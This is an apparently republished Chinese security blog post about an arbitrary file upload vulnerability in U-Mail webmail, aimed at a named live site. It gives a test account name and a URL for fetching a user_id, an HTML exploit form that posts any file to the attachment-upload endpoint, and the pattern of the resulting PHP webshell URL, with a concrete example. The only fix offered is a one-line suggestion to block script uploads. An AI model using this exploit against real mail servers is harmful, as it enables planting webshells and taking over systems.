先登录官方测试站点:   U-Mail任意文件上传漏洞一枚及修复 – 网站安全插图
U-Mail任意文件上传漏洞一枚及修复 – 网站安全插图1

    这里登录的账号为:mailtest3721   再获取当前登录用户的user_id   http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721   这里mailtest3721对应的user_id为:78609   U-Mail任意文件上传漏洞一枚及修复 – 网站安全插图2   html exp:  

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>

上传文件:<input type="file" name="Filedata" size="30">

<INPUT type=submit value=上传 name=Submit>

 

  上传后获取"file_id":"13995534500"   U-Mail任意文件上传漏洞一枚及修复 – 网站安全插图3 shell地址:   http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php   这里是:   http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php   U-Mail任意文件上传漏洞一枚及修复 – 网站安全插图4   修复方案: 禁止上传php等脚本文件。

    上一篇: 新东方在线学习网站一处任意文件下载问题导致

    下一篇: 如何评价XSS在黑客攻防中的地位或重要性? - 网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《U-Mail任意文件上传漏洞一枚及修复 – 网站安全
   

还没有人抢沙发呢~